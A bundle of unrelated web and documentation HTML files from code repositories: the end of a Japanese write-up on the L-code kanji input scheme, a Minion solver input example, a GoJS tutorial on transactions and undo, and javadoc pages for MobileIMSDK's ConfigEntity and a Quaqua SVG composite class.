<tr><th>L-code (標準コード)</th><td>1449 打鍵、 2.253 打鍵/文字</td></tr>
<tr><th>L-code (短縮コード)</th><td>1396 打鍵、 2.171 打鍵/文字</td></tr>
<tr><th>[参考] ローマ字 </th><td>1475 打鍵 </td></tr>
</tbody>
</table>
<p>
『日本国憲法前文』では L-code は TT-Code や TUT-Code に比べて
打鍵数が多くなりましたが、単純なローマ字入力よりは減少しており、
漢直として、一応の有効性が示されたと言えそうです。
</p>
<h2><a name="sec_implementation" href="#sec_implementation">実装と練習、実際の使用感</a></h2>
<p>
実装は Windows 7 上の 漢直Win 1.28 用のテーブルファイルを作成する
という形で行いました。
</p>
<p>
また、練習環境として Windows 7 上の Google Chrome で動作する
eelll/JS を (機能拡充およびファイル追加などを行って) 用意し、
実際に練習をして……
</p>
<p>
(……その成果と実際の使用感を、最後に書くべきところなのですが、
当時の L-code に関するドキュメントは、ここでとぎれてしまっていて、
続きが欠落しています。
<br>
確か、「このコードはダメだ」と判断して計画自体を中断したのだったと
思いますが、その理由は、結局のところ L-code は一つの試みの域を出ず、
使い慣れた入力方式に取って代わったり併用できるだけのレベルには
至っていなかったということなのでしょう)
</p>
<!-- ============================================================= -->
<!-- footer -->
<hr>
<div class="menu">
<a href=".">もどる</a>
</div>
<div class="version">
<!-- time-stamp-start -->2015-10-27<!-- time-stamp-end -->
</div>
<!-- ============================================================= -->
</div> <!-- container -->
</body>
</html>
<!-- ============================================================= -->
<!--
:: Local Variables:
:: time-stamp-line-limit: -24
:: time-stamp-start: "<!-\\- *time-stamp-start *-\\-."
:: time-stamp-end: "<!-\\- *time-stamp-end *-\\-."
:: time-stamp-format: "%:y-%02m-%02d"
:: End:
-->
|
docs/htmlhelp/input_example.html | LeslieW/minion | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>input example</title>
</head>
<body>
<h1>Help on <tt>input example</tt></h1>
<h3>Example</h3>
<pre>
Below is a complete minion input file with commentary, as an example.
MINION 3
# While the variable section doesn't have to come first, you can't
# really do anything until
# You have one...
**VARIABLES**
# There are 4 type of variables
BOOL bool # Boolean don't need a domain
BOUND b {1..3} # Bound vars need a domain given as a range
DISCRETE d {1..3} # So do discrete vars
#Note: Names are case sensitive!
# Internally, Bound variables are stored only as a lower and upper bound
# Whereas discrete variables allow any sub-domain
SPARSEBOUND s {1,3,6,7} # Sparse bound variables take a sorted list of values
# We can also declare matrices of variables!
DISCRETE q[3] {0..5} # This is a matrix with 3 variables: q[0],q[1] and q[2]
BOOL bm[2,2] # A 2d matrix, variables bm[0,0], bm[0,1], bm[1,0], bm[1,1]
BOOL bn[2,2,2,2] # You can have as many indices as you like!
#The search section is entirely optional
**SEARCH**
# Note that everything in SEARCH is optional, and can only be given at
# most once!
# If you don't give an explicit variable ordering, one is generated.
# These can take matrices in interesting ways like constraints, see below.
VARORDER [bool,b,d]
# If you don't give a value ordering, 'ascending' is used
#VALORDER [a,a,a,a]
# You can have one objective function, or none at all.
MAXIMISING bool
# MINIMISING x3
# both (MAX/MIN)IMISING and (MAX/MIN)IMIZING are accepted...
# Print statement takes a vector of things to print
PRINT [bool, q]
# You can also give:
# PRINT ALL (the default)
# PRINT NONE
# Declare constraints in this section!
**CONSTRAINTS**
# Constraints are defined in exactly the same way as in MINION input
formats 1 & 2
eq(bool, 0)
eq(b,d)
# To get a single variable from a matrix, just index it
eq(q[1],0)
eq(bn[0,1,1,1], bm[1,1])
# It's easy to get a row or column from a matrix. Just use _ in the
# indices you want
# to vary. Just giving a matrix gives all the variables in that matrix.
#The following shows how flattening occurs...
# [bm] == [ bm[_,_] ] == [ bm[0,0], bm[0,1], bm[1,0], bm[1,1] ]
# [ bm[_,1] ] = [ bm[0,1], bm[1,1] ]
# [ bn[1,_,0,_] = [ bn[1,0,0,0], b[1,0,0,1], b[1,1,0,0], b[1,1,0,1] ]
# You can string together a list of such expressions!
lexleq( [bn[1,_,0,_], bool, q[0]] , [b, bm, d] )
# One minor problem.. you must always put [ ] around any matrix expression, so
# lexleq(bm, bm) is invalid
lexleq( [bm], [bm] ) # This is OK!
# Can give tuplelists, which can have names!
# The input is: <name> <num_of_tuples> <tuple_length> <numbers...>
# The formatting can be about anything..
**TUPLELIST**
Fred 3 3
0 2 3
2 0 3
3 1 3
Bob 2 2 1 2 3 4
#No need to put everything in one section! All sections can be reopened..
**VARIABLES**
# You can even have empty sections.. if you want
**CONSTRAINTS**
#Specify tables by their names..
table([q], Fred)
# Can still list tuples explicitally in the constraint if you want at
# the moment.
# On the other hand, I might remove this altogether, as it's worse than giving
# Tuplelists
table([q],{ <0,2,3>,<2,0,3>,<3,1,3> })
#Must end with the **EOF** marker!
**EOF**
Any text down here is ignored, so you can write whatever you like (or
nothing at all...)
</pre>
<p><a href="index.html">Home</a></p>
</body>
</html>
|
Website/metro/Voorbeelden/Pipes voorbeeld/intro/transactions.html | RamonValk/PVNG | <!DOCTYPE html>
<html>
<head>
<title>GoJS Transactions -- Northwoods Software</title>
<!-- Copyright 1998-2015 by Northwoods Software Corporation. -->
<link href="goIntro.css" rel="stylesheet" type="text/css"/>
<script src="go.js"></script>
<script src="goIntro.js"></script>
</head>
<body onload="goIntro()">
<div id="content">
<h2>Transactions and the UndoManager</h2>
<p>
<b>GoJS</b> models and diagrams make use of an <a>UndoManager</a> that can record all changes and support
undoing and redoing those changes.
Each state change is recorded in a <a>ChangedEvent</a>, which includes enough information about both before and after
to be able to reproduce the state change in either direction, backward (undo) or forward (redo).
Such changes are grouped together into <a>Transaction</a>s so that a user action, which may result in many changes,
can be undone and redone as a single operation.
</p>
<p>
Not all state changes result in <a>ChangedEvent</a>s that can be recorded by the UndoManager.
Some properties are considered transient, such as <a>Diagram.position</a>, <a>Diagram.scale</a>,
<a>Diagram.currentTool</a>, <a>Diagram.currentCursor</a>, or <a>Diagram.isModified</a>.
Some changes are structural or considered unchanging, such as <a>Diagram.model</a>, any property of <a>CommandHandler</a>,
or any of the tool or layout properties.
But most <a>GraphObject</a> and model properties do raise a ChangedEvent on the Diagram or Model, respectively,
when a property value has been changed.
</p>
<h3>Transactions</h3>
<p>
Whenever you modify a model or its data programmatically in response to some event, you should wrap the code in a transaction.
Call <a>Diagram.startTransaction</a> or <a>Model.startTransaction</a>, make the changes,
and then call <a>Diagram.commitTransaction</a> or <a>Model.commitTransaction</a>.
Although the primary benefit from using transactions is to group together side-effects for undo/redo,
you should use transactions even if your application does not support undo/redo by the user.
</p>
<p>
As with database transactions, you will want to perform transactions that are short and infrequent.
Do not leave transactions ongoing between user actions.
Consider whether it would be better to have a single transaction surrounding a loop
instead of starting and finishing a transaction repeatedly within a loop.
Do not execute transactions within a property setter -- such granularity is too small.
Instead execute a transaction where the properties are set in response to some user action or external event.
</p>
<p>
However, unlike database transactions, you do not need to conduct a transaction in order to access any state.
All JavaScript objects are in memory, so you can look at their properties at any time that it would make sense to do so.
But when you want to make state changes to a <a>Diagram</a> or a <a>GraphObject</a> or a <a>Model</a> or a JavaScript object in a model,
do so within a transaction.
</p>
<p>
The only exception is that transactions are unnecessary when initializing a model before assigning the model to the <a>Diagram.model</a>.
(A Diagram only gets access to an UndoManager via the Model, the <a>Model.undoManager</a> property.)
</p>
<p>
Furthermore many event handlers and listeners are already executed within transactions
that are conducted by <a>Tool</a>s or <a>CommandHandler</a> commands,
so you often will not need to start and commit a transaction within such functions.
Read the API documentation for details about whether a function is called within a transaction.
For example, setting <a>GraphObject.click</a> to an event handler to respond to a click on an object
needs to perform a transaction if it wants to modify the model or the diagram.
Most custom click event handlers do not change the diagram but instead update some HTML.
But implementing an "ExternalObjectsDropped" <a>DiagramEvent</a> listener, which usually does want to
modify the just-dropped Parts in the <a>Diagram.selection</a>, is called within the <a>DraggingTool</a>'s
transaction, so no additional start/commit transaction calls are needed.
Finally, some customizations, such as the <a>Node.linkValidation</a> predicate, should not modify the diagram or model at all.
</p>
<p>
Both model changes and diagram changes are recorded in the <a>UndoManager</a>
only if the model's <a>UndoManager.isEnabled</a> has been set to true.
</p>
<p>
A typical case is where some command makes a change to the model.
In this example the addChild function adds a link connecting the selected node to a new node.
When no Node is selected, nothing happens.
</p>
<pre data-language="javascript" id="transaction">
// define a function named "addChild" that is invoked by a button click
addChild = function() {
var selnode = diagram.selection.first();
if (!(selnode instanceof go.Node)) return;
diagram.startTransaction("add node and link");
// have the Model add a new node data
var newnode = { key: "N" };
diagram.model.addNodeData(newnode); // this makes sure the key is unique
// and then add a link data connecting the original node with the new one
var newlink = { from: selnode.data.key, to: newnode.key };
// add the new link to the model
diagram.model.addLinkData(newlink);
// finish the transaction
diagram.commitTransaction("add node and link");
};
diagram.nodeTemplate =
$(go.Node, "Auto",
$(go.Shape, "RoundedRectangle", { fill: "whitesmoke" }),
$(go.TextBlock, { margin: 5 },
new go.Binding("text", "key"))
);
diagram.layout = $(go.TreeLayout);
var nodeDataArray = [
{ key: "Alpha" },
{ key: "Beta" }
];
var linkDataArray = [
{ from: "Alpha", to: "Beta" }
];
diagram.model = new go.GraphLinksModel(nodeDataArray, linkDataArray);
diagram.model.undoManager.isEnabled = true;
</pre>
<p>
</p>
<input type="button" onclick="addChild()" value="addChild() to selected Node" />
<script>goCode("transaction", 600, 200)</script>
<h3>Supporting the UndoManager</h3>
<p>
Changes to JavaScript data properties do not automatically result in any notifications that can be observed.
Thus when you want to change the value of a property in a manner that can be undone and redone,
you should call <a>Model.setDataProperty</a>.
This will get the previous value for the property, set the property to the new value, and
call <a>Model.raiseDataChanged</a>, which will also automatically update any target bindings in the Node
corresponding to the data.
</p>
<pre data-language="javascript" id="changingData">
diagram.nodeTemplate =
$(go.Node, "Auto",
$(go.Shape, "RoundedRectangle", { fill: "whitesmoke" }),
$(go.TextBlock, { margin: 5 },
new go.Binding("text", "someValue")) // bind to the "someValue" data property
);
var nodeDataArray = [
{ key: "Alpha", someValue: 1 }
];
diagram.model = new go.GraphLinksModel(nodeDataArray);
diagram.model.undoManager.isEnabled = true;
// define a function named "incrementData" callable by onclick
function incrementData() {
var model = diagram.model;
// all model changes should happen in a transaction
model.startTransaction("increment");
var data = model.nodeDataArray[0]; // get the first node data
model.setDataProperty(data, "someValue", data.someValue + 1);
model.commitTransaction("increment");
};
</pre>
<p>
Move the node around.
Click on the button to increase the value of the "someValue" property on the data.
Ctrl-Z and Ctrl-Y to undo and redo the moves and value changes.
</p>
<input type="button" onclick="incrementData()" value="incrementData()" />
<script>goCode("changingData", 250, 150)</script>
</div>
</body>
</html>
|
docs/api_docs/client/android/net/openmob/mobileimsdk/android/conf/ConfigEntity.html | suxinde2009/MobileIMSDK | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="zh">
<head>
<!-- Generated by javadoc (version 1.7.0_51) on Wed Jan 03 16:17:48 CST 2018 -->
<meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
<title>ConfigEntity (MobileIMSDK 3.2(Android平台) API文档)</title>
<meta name="date" content="2018-01-03">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="ConfigEntity (MobileIMSDK 3.2(Android\u5E73\u53F0) API\u6587\u6863)";
}
//-->
</script>
<noscript>
<div>您的浏览器已禁用 JavaScript。</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="跳过导航链接"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="导航">
<li><a href="../../../../../overview-summary.html">概览</a></li>
<li><a href="package-summary.html">程序包</a></li>
<li class="navBarCell1Rev">类</li>
<li><a href="class-use/ConfigEntity.html">使用</a></li>
<li><a href="package-tree.html">树</a></li>
<li><a href="../../../../../deprecated-list.html">已过时</a></li>
<li><a href="../../../../../index-files/index-1.html">索引</a></li>
<li><a href="../../../../../help-doc.html">帮助</a></li>
</ul>
<div class="aboutLanguage"><em><b>MobileIMSDK4a 3.2(build 2018/01/03)</b></em></div>
</div>
<div class="subNav">
<ul class="navList">
<li>上一个类</li>
<li><a href="../../../../../net/openmob/mobileimsdk/android/conf/ConfigEntity.SenseMode.html" title="net.openmob.mobileimsdk.android.conf中的枚举"><span class="strong">下一个类</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?net/openmob/mobileimsdk/android/conf/ConfigEntity.html" target="_top">框架</a></li>
<li><a href="ConfigEntity.html" target="_top">无框架</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../allclasses-noframe.html">所有类</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>概要: </li>
<li><a href="#nested_class_summary">嵌套</a> | </li>
<li><a href="#field_summary">字段</a> | </li>
<li><a href="#constructor_summary">构造器</a> | </li>
<li><a href="#method_summary">方法</a></li>
</ul>
<ul class="subNavList">
<li>详细资料: </li>
<li><a href="#field_detail">字段</a> | </li>
<li><a href="#constructor_detail">构造器</a> | </li>
<li><a href="#method_detail">方法</a></li>
</ul>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">net.openmob.mobileimsdk.android.conf</div>
<h2 title="类 ConfigEntity" class="title">类 ConfigEntity</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>net.openmob.mobileimsdk.android.conf.ConfigEntity</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<hr>
<br>
<pre>public class <span class="strong">ConfigEntity</span>
extends java.lang.Object</pre>
<div class="block">MobileIMSDK的全局参数控制类。</div>
<dl><dt><span class="strong">从以下版本开始:</span></dt>
<dd>2.0</dd>
<dt><span class="strong">版本:</span></dt>
<dd>1.0</dd>
<dt><span class="strong">作者:</span></dt>
<dd>Jack Jiang, 2015-08-17</dd></dl>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== NESTED CLASS SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="nested_class_summary">
<!-- -->
</a>
<h3>嵌套类概要</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="嵌套类概要表, 列表嵌套类和解释">
<caption><span>嵌套类</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">限定符和类型</th>
<th class="colLast" scope="col">类和说明</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static class </code></td>
<td class="colLast"><code><strong><a href="../../../../../net/openmob/mobileimsdk/android/conf/ConfigEntity.SenseMode.html" title="net.openmob.mobileimsdk.android.conf中的枚举">ConfigEntity.SenseMode</a></strong></code>
<div class="block">MobileIMSDK即时通讯核心框架预设的敏感度模式.</div>
</td>
</tr>
</table>
</li>
</ul>
<!-- =========== FIELD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="field_summary">
<!-- -->
</a>
<h3>字段概要</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="字段概要表, 列表字段和解释">
<caption><span>字段</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">限定符和类型</th>
<th class="colLast" scope="col">字段和说明</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static java.lang.String</code></td>
<td class="colLast"><code><strong><a href="../../../../../net/openmob/mobileimsdk/android/conf/ConfigEntity.html#appKey">appKey</a></strong></code>
<div class="block">全局设置:AppKey。</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static int</code></td>
<td class="colLast"><code><strong><a href="../../../../../net/openmob/mobileimsdk/android/conf/ConfigEntity.html#localUDPPort">localUDPPort</a></strong></code>
<div class="block">全局设置:本地UDP数据发送和侦听端口。</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static java.lang.String</code></td>
<td class="colLast"><code><strong><a href="../../../../../net/openmob/mobileimsdk/android/conf/ConfigEntity.html#serverIP">serverIP</a></strong></code>
<div class="block">全局设置:服务端IP或域名。</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static int</code></td>
<td class="colLast"><code><strong><a href="../../../../../net/openmob/mobileimsdk/android/conf/ConfigEntity.html#serverUDPPort">serverUDPPort</a></strong></code>
<div class="block">全局设置:服务端UDP服务侦听端口号。</div>
</td>
</tr>
</table>
</li>
</ul>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_summary">
<!-- -->
</a>
<h3>构造器概要</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="构造器概要表, 列表构造器和解释">
<caption><span>构造器</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">构造器和说明</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><strong><a href="../../../../../net/openmob/mobileimsdk/android/conf/ConfigEntity.html#ConfigEntity()">ConfigEntity</a></strong>()</code> </td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method_summary">
<!-- -->
</a>
<h3>方法概要</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="方法概要表, 列表方法和解释">
<caption><span>方法</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">限定符和类型</th>
<th class="colLast" scope="col">方法和说明</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static void</code></td>
<td class="colLast"><code><strong><a href="../../../../../net/openmob/mobileimsdk/android/conf/ConfigEntity.html#setSenseMode(net.openmob.mobileimsdk.android.conf.ConfigEntity.SenseMode)">setSenseMode</a></strong>(<a href="../../../../../net/openmob/mobileimsdk/android/conf/ConfigEntity.SenseMode.html" title="net.openmob.mobileimsdk.android.conf中的枚举">ConfigEntity.SenseMode</a> mode)</code>
<div class="block">设置MobileIMSDK即时通讯核心框架预设的敏感度模式。</div>
</td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods_inherited_from_class_java.lang.Object">
<!-- -->
</a>
<h3>从类继承的方法 java.lang.Object</h3>
<code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ============ FIELD DETAIL =========== -->
<ul class="blockList">
<li class="blockList"><a name="field_detail">
<!-- -->
</a>
<h3>字段详细资料</h3>
<a name="appKey">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>appKey</h4>
<pre>public static java.lang.String appKey</pre>
<div class="block">全局设置:AppKey。</div>
</li>
</ul>
<a name="serverIP">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>serverIP</h4>
<pre>public static java.lang.String serverIP</pre>
<div class="block">全局设置:服务端IP或域名。
<p>
如需设置本参数,请在登陆前调用,否则将不起效。</div>
</li>
</ul>
<a name="serverUDPPort">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>serverUDPPort</h4>
<pre>public static int serverUDPPort</pre>
<div class="block">全局设置:服务端UDP服务侦听端口号。
<p>
如需设置本参数,请在登陆前调用,否则将不起效。</div>
</li>
</ul>
<a name="localUDPPort">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>localUDPPort</h4>
<pre>public static int localUDPPort</pre>
<div class="block">全局设置:本地UDP数据发送和侦听端口。默认是7801。
<p>
如需设置本参数,请在登陆前调用,否则将不起效。
<p>
本参数为0时表示由系统自动分配端口(这意味着同时开启两个及以上本SDK
的实例也不会出现端口占用冲突),否则使用开发者指定的端口。
<br>
在什么场景下需要使用固定端口号呢?通常用于debug时,比如观察3G网络下
的运营商外网端口分配情况。当然只要开发者确认使用的端口不会与其它APP
冲突,则可随便指定本地端口,不会有任何影响(不影响与服务端的通信逻辑)。
<p>
2017-12-11日注:使用固定端口在极不稳定的网络情况下可以保证“会话”的
稳定性(v3.1版前,默认使用随机端口的情况下在网络从极烂的情况下恢复
时,有非常小的概率出现客户端每隔21秒掉线的bug。但v3.1版后已从服务端彻底
解决了这个21秒的Bug,但还是建议您考虑使用固定端口的保守方案,稳定高于
一切啊)。</div>
</li>
</ul>
</li>
</ul>
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_detail">
<!-- -->
</a>
<h3>构造器详细资料</h3>
<a name="ConfigEntity()">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>ConfigEntity</h4>
<pre>public ConfigEntity()</pre>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method_detail">
<!-- -->
</a>
<h3>方法详细资料</h3>
<a name="setSenseMode(net.openmob.mobileimsdk.android.conf.ConfigEntity.SenseMode)">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>setSenseMode</h4>
<pre>public static void setSenseMode(<a href="../../../../../net/openmob/mobileimsdk/android/conf/ConfigEntity.SenseMode.html" title="net.openmob.mobileimsdk.android.conf中的枚举">ConfigEntity.SenseMode</a> mode)</pre>
<div class="block">设置MobileIMSDK即时通讯核心框架预设的敏感度模式。
<p>
请在登陆前调用,否则将不起效.
<p>
<b>重要说明:</b><u>客户端本模式的设定必须要与服务端的模式设制保持一致</u>,否则
可能因参数的不一致而导致IM算法的不匹配,进而出现不可预知的问题。</div>
<dl><dt><span class="strong">参数:</span></dt><dd><code>mode</code> - </dd><dt><span class="strong">另请参阅:</span></dt><dd><a href="../../../../../net/openmob/mobileimsdk/android/conf/ConfigEntity.SenseMode.html" title="net.openmob.mobileimsdk.android.conf中的枚举"><code>ConfigEntity.SenseMode</code></a></dd></dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="跳过导航链接"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="导航">
<li><a href="../../../../../overview-summary.html">概览</a></li>
<li><a href="package-summary.html">程序包</a></li>
<li class="navBarCell1Rev">类</li>
<li><a href="class-use/ConfigEntity.html">使用</a></li>
<li><a href="package-tree.html">树</a></li>
<li><a href="../../../../../deprecated-list.html">已过时</a></li>
<li><a href="../../../../../index-files/index-1.html">索引</a></li>
<li><a href="../../../../../help-doc.html">帮助</a></li>
</ul>
<div class="aboutLanguage"><em><b>MobileIMSDK4a 3.2(build 2018/01/03)</b></em></div>
</div>
<div class="subNav">
<ul class="navList">
<li>上一个类</li>
<li><a href="../../../../../net/openmob/mobileimsdk/android/conf/ConfigEntity.SenseMode.html" title="net.openmob.mobileimsdk.android.conf中的枚举"><span class="strong">下一个类</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?net/openmob/mobileimsdk/android/conf/ConfigEntity.html" target="_top">框架</a></li>
<li><a href="ConfigEntity.html" target="_top">无框架</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../allclasses-noframe.html">所有类</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>概要: </li>
<li><a href="#nested_class_summary">嵌套</a> | </li>
<li><a href="#field_summary">字段</a> | </li>
<li><a href="#constructor_summary">构造器</a> | </li>
<li><a href="#method_summary">方法</a></li>
</ul>
<ul class="subNavList">
<li>详细资料: </li>
<li><a href="#field_detail">字段</a> | </li>
<li><a href="#constructor_detail">构造器</a> | </li>
<li><a href="#method_detail">方法</a></li>
</ul>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small><center>Copyright © 2018 <a target=_blank href=http://www.52im.net>即时通讯网(52im.net) - 即时通讯技术社区</a>. All rights reserved.</center></small></p>
</body>
</html>
|
Quaqua/javadoc/ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.InCompositeContext_INT_PACK.html | tbepler/java-crossplatform-utility | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_20-ea) on Sat Mar 22 13:49:58 CET 2014 -->
<title>SVGComposite.InCompositeContext_INT_PACK (Quaqua 9.1 2014-03-22)</title>
<meta name="date" content="2014-03-22">
<link rel="stylesheet" type="text/css" href="../../../../../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../../../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="SVGComposite.InCompositeContext_INT_PACK (Quaqua 9.1 2014-03-22)";
}
}
catch(err) {
}
//-->
var methods = {"i0":10};
var tabs = {65535:["t0","All Methods"],2:["t2","Instance Methods"],8:["t4","Concrete Methods"]};
var altColor = "altColor";
var rowColor = "rowColor";
var tableTab = "tableTab";
var activeTableTab = "activeTableTab";
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../../../help-doc.html">Help</a></li>
</ul>
<div class="aboutLanguage">Quaqua 9.1 2014-03-22</div>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.InCompositeContext.html" title="class in ch.randelshofer.quaqua.ext.batik.ext.awt.image"><span class="typeNameLink">Prev Class</span></a></li>
<li><a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.LightenCompositeContext.html" title="class in ch.randelshofer.quaqua.ext.batik.ext.awt.image"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../../../../index.html?ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.InCompositeContext_INT_PACK.html" target="_top">Frames</a></li>
<li><a href="SVGComposite.InCompositeContext_INT_PACK.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li>Constr | </li>
<li><a href="#method.summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li>Constr | </li>
<li><a href="#method.detail">Method</a></li>
</ul>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">ch.randelshofer.quaqua.ext.batik.ext.awt.image</div>
<h2 title="Class SVGComposite.InCompositeContext_INT_PACK" class="title">Class SVGComposite.InCompositeContext_INT_PACK</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li><a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.AlphaPreCompositeContext.html" title="class in ch.randelshofer.quaqua.ext.batik.ext.awt.image">ch.randelshofer.quaqua.ext.batik.ext.awt.image.SVGComposite.AlphaPreCompositeContext</a></li>
<li>
<ul class="inheritance">
<li><a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.AlphaPreCompositeContext_INT_PACK.html" title="class in ch.randelshofer.quaqua.ext.batik.ext.awt.image">ch.randelshofer.quaqua.ext.batik.ext.awt.image.SVGComposite.AlphaPreCompositeContext_INT_PACK</a></li>
<li>
<ul class="inheritance">
<li>ch.randelshofer.quaqua.ext.batik.ext.awt.image.SVGComposite.InCompositeContext_INT_PACK</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<dl>
<dt>All Implemented Interfaces:</dt>
<dd>java.awt.CompositeContext</dd>
</dl>
<dl>
<dt>Enclosing class:</dt>
